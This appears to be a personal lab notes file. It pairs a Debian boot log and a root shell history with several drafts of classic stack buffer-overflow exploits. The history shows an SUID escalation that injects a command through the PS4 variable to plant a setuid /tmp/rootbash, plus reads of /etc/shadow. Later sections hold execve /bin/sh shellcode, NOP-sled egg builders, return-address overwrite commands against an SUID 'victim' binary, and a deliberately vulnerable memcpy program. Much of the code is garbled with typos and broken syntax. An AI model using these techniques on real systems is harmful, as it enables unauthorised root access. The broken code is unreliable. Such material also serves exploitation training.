1218Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1219Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1220Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1221Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1222Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1223Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1224Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1225Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1226Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1227Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1228Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1229Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1230Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1231Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1232Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1233Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1234Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1235Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1236Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1237Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1238Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1239Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1240Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1241Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1242Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1243Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1244Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1245Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1246Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1247Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1248Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1249Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1250Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1251Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1252Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1253Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1254Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1255Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1256Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1257Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1258Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1259Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1260Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1261Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1262Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1263Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1264Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1265Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1266Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1267Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1268rootbash-4.1# history | tail -100
1269 115 ls
1270 116 cat /etc/hosts.allow
1271 117 arp -A
1272 118 arp
1273 119 arp -vpn
1274 120 arp -vn
1275 121 netstat -A
1276 122 netstat -r
1277 123 netstat -i
1278 124 netstat -g
1279 125 netstat -e
1280 126 netstat -l
1281 127 netstat
1282 128 man netstat
1283 129 netstat -tcp
1284 130 netstat -udp
1285 131 netstat -p tcp
1286 132 netstat -p udp
1287 133 netstat -p tcp 22
1288 134 netstat -p 22
1289 135 netstat -p 80
1290 136 netstat -p tcp
1291 137 netstat -p udp
1292 138 ls
1293 139 clear
1294 140 dmesg | grep /var/log
1295 141 dmesg | grep /var/log/messages.log
1296 142 cd /var/log
1297 143 ls
1298 144 dmesg | grep /var/log/syslog | less
1299 145 dmesg | grep /var/log/syslog | more
1300 146 dmesg | grep /var/log/syslog
1301 147 ls -la /var/log/syslog
1302 148 chmod 755 /var/log/syslog
1303 149 ls -la /var/log/syslog
1304 150 ls
1305 151 tail -f /var/log/syslog
1306 152 tail -f /var/log/syslog | more
1307 153 dmesg | grep /var/log/syslog > w0rd.txt
1308 154 cat w0rd.txt
1309 155 ls
1310 156 chmod 755 w0rd.txt
1311 157 ls
1312 158 cat w0rd.txt
1313 159 ls -la w0rd.txt
1314 160 rm -f w0rd.txt
1315 161 ls
1316 162 cat /var/log/syslog
1317 163 cat /var/log/syslog | less foo.txt
1318 164 cat /var/log/syslog | grep /usr/local/bin
1319 165 cat /var/log/syslog | grep /tmp
1320 166 cat /var/log/syslog | grep /rootbash
1321 167 ls
1322 168 cat /var/log/syslog
1323 169 ls
1324 170 dmesg /var/log/auth.log.2.gz
1325 171 cat /var/log/wtmp
1326 172 cat /var/run/utmp
1327 173 who am i
1328 174 users
1329 175 last
1330 176 finger
1331 177 cat /var/log/secure
1332 178 cat /var/log/auth.log
1333 179 head -5 /var/log/auth.log
1334 180 fc -l -10
1335 181 nano .bash_history
1336 182 history 100
1337 183 ls -la
1338 184 who am i
1339 185 cd /
1340 186 ls
1341 187 cd /home
1342 188 ls
1343 189 cd user/
1344 190 ls
1345 191 cd ..
1346 192 ls
1347 193 cat /etc/passwd
1348 194 cat /etc/shadow
1349 195 exit
1350 196 /usr/local/bin/suid-env2
1351 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1352 198 /tmp/rootbash -p
1353 199 exit
1354 200 cls
1355 201 exit
1356 202 ls
1357 203 cd tools
1358 204 ls
1359 205 /tmp/rootbash -p
1360 206 exit
1361 207 su newroot
1362 208 whoami
1363 209 cat /etc/passwd
1364 210 su root
1365 211 exit
1366 212 tail -f /var/log/messages
1367 213 cat /var/log/messages
1368 214 history | tail -100
1369rootbash-4.1# id
1370uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1371rootbash-4.1# whoami
1372root
1373rootbash-4.1# ls -la /home/user/bmillakid
1374rootbash-4.1# cd /home
1375rootbash-4.1# ls
1376user
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386#include <stdlib.h>
1387
1388#define offset_size 0
1389#define buffer-size 600
1390
1391char sc[] =
1392"\xc0\xf2\x03\x42" //system()
1393"\x02\x9b\xb0\x42" //exit()
1394"\xa0\x8a\xb2\x42" //binsh
1395
1396unsigned llong find_start(void) {
1397
1398 __asm__("mov1 %esp,%eax");
1399}
1400
1401int main(int argc, char *argv[])
1402{
1403
1404 char *buff, *ptr;
1405 long *addr_ptr, addr;
1406 int offset=offset_size, bsize=buffer_size;
1407 int i;
1408
1409 if (argc > 1) bsize = atoi(argv[1]);
1410 if (argc > 2) offset = atoi(argv[2]);
1411
1412 addr = find_start() -offset;
1413 ptr = buff;
1414 addr_ptr= (long *) ptr;
1415 for (i = 0; i < bsize; i+=4)
1416 *(addr_ptr++) =addr;
1417
1418 ptr +=4;
1419
1420 for (i = 0; i < strlen(sc); i++)
1421 *(ptr++) =sc[i];
1422
1423buff[bsize -1] = '\0';
1424
1425memcpy(buff,"BUF=",4);
1426putenv(buff);
1427system("/bin/bash");
1428
1429}
1430
1431
1432specific syscall number is loaded into eax
1433syscall function placed into other Registers
1434instruction int 0x80 is executed
1435CPU switches to kernel mode
1436syscall function is executed
1437
1438#include <stdlib.h>
1439
1440#define DEFAULT_OFFSET 0
1441#define DEFAULT_BUFFER_SIZE 512
1442#define NOP 0x90
1443
1444char shellcode[] =
1445
1446
1447
1448“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
1449
1450
1451
1452
1453 unsigned long get_sp(void) {
1454 __asm__("move1 %esp,%eax");
1455 }
1456
1457 void main(int argc, char *argv[])
1458
1459 {
1460
1461 char *buff, *ptr;
1462 long *addr_ptr, addr;
1463 int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
1464 int i;
1465
1466 if (argc > 1) bsize = atoi (argv[1]);
1467 if (argc > 2) offset = atoi (argv[2]);
1468
1469 if (!(buff = malloc(bsize))) {
1470 printf("fuck off\n");
1471 exit(0);
1472 }
1473
1474 addr = get_sp() - offset;
1475 printf("use this: 0x%x\n", addr);
1476
1477 ptr = buff;
1478 addr_ptr = (long *) ptr;
1479 for (i =0 ; i < bsize; i+=4)
1480 *(addr+ptr++) = addr;
1481
1482 for (i = 0; i < bsize/2; i++)
1483 buff[i] = NOP;
1484
1485 ptr = buff + ((bsize/2 - (strlen(shellcode)/2));
1486 for (i = 0; i < strlen(shellcode); i++)
1487 *(ptr++) = shellcode[i];
1488
1489 buff[bsize - 1] = '\0';
1490
1491 memcpy(buff, "BUF=",4);
1492 putenv(buff);
1493 system("/bin/bash");
1494
1495}
1496//shell.c
1497int main() {
1498 char *name[2];
1499
1500 name[0] = "/bin/sh";
1501 name[1] = 0x0;
1502 execve(name[0], name, 0x0);
1503 exit (0);
1504 }
1505
1506
1507//shellcode.c
1508char shellcode[] =
1509“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1510
1511int main()
1512{
1513
1514 int = (int *)&ret +2;
1515 (*ret) = (int)shellcode;
1516
1517}
1518
1519[ask application to force input, causing the address we supplised to be loaded into EP
1520,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1521
1522when RET is popped off the stack and loaded into EIP the first instruction is executed of the shellcode
1523
1524
1525Location pointer
1526
1527// find_start.c
1528unsigned long find_start(void)
1529{
1530
1531 __asm__("move1 %esp, %eax");
1532
1533}
1534
1535int main()
1536{
1537
1538 printf("0x%n\n",find_start());
1539}
1540
1541[putting programs into arranys with no bounds checking ]
1542 [has to be owned by root in suid]
1543
1544sudo chown root victim
1545sudo chmod +s victim
1546
1547./victim <shellcode>padding>choice-of-returnaddress
1548
1549./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1550
1551./victim $(printf "%0512x" 0)
1552./victim $(printf %0516x" 0)
1553./victim $(printf %0520x" 0)
1554./victim $(printf %0524x" 0)
1555Segfault
1556./victim $(printf %0528x" 0)
1557Segfault
1558[we can tell the saved return address is probably 524-528 bytes
1559shellcode = [40]
1560padding = [480]
1561saved ret address [0xbffffad8]
1562
1563./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1564[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1565
1566[little indian]
1567
1568./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1569Illegal instruction
1570
15718%0484x\x38\xfa\xff\xbf")
1572
1573[program to guess offset between start of the program and first instruction for shellcode]
1574
1575#include <stdlib.h>
1576
1577#define offset_size 0
1578#define buffer_size 512
1579
1580
1581char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1582
1583unsigned long find_start(void) {
1584
1585 __asm__(*mov1 %esp,%eax");
1586
1587}
1588
1589int main(int argc, char *argv[])
1590{
1591
1592 char *buff, *ptr;
1593 long *addr_ptr, addr;
1594 int offset=offset_size, bsize=buffer_size;
1595 int i;
1596
1597 if (argc > 1) bsize = atoi(argv[1]);
1598 if (argc > 2) offset = atoi(argv[2]);
1599
1600 addr = find_start() - offset;
1601 printf("attempt address: 0x%n\n",addr);
1602
1603 ptr = buff;
1604 addr_ptr =(long *) ptr;
1605 for (i - 0; i < bsize; i+=4)
1606 * (addr_ptr++) = addr;
1607
1608 ptr +=4;
1609
1610 for (i = 0; i < strlen(sc); i++)
1611 *(ptr++) = sc[i];
1612
1613 buff[bsize - 1] = '\0';
1614
1615 memcpy(buff, "BUF=",4);
1616 putenv(buff);
1617 system(" /bin/bash");
1618
1619}
1620
1621
1622[NOP]
1623
1624
1625
1626#include <stdlib.h>
1627
1628#define DEFAULT_OFFSET 0
1629#define DEFAULT_BUFFER_SIZE 512
1630#define NOP 0x90
1631
1632
1633 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1634\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1635
1636unsigned long get_sp(void) {
1637 __asm__("mov1 %esp,%eax");
1638}
1639
1640void main(int argc, char *argv[])
1641
1642{
1643
1644 char *buff, *ptr;
1645
1646 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1647
1648
1649#include <stdio.h>
1650#include <stdlib.h>
1651
1652void jumpesp(){
1653 __asm__("jmp *%esp"); //gadget to jump to esp
1654{
1655
1656void copy(char *arg) {
1657 char buf[1000];
1658 memcpy(buf ,arg, strlen(arg)); //vuln function
1659}
1660
1661int main(int argc, char **argv) {
1662
1663 if(argc>1) {
1664 copy(argv[1]);
1665 }
1666 return 0;
1667}
1668
1669
1670
1671---snip---
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682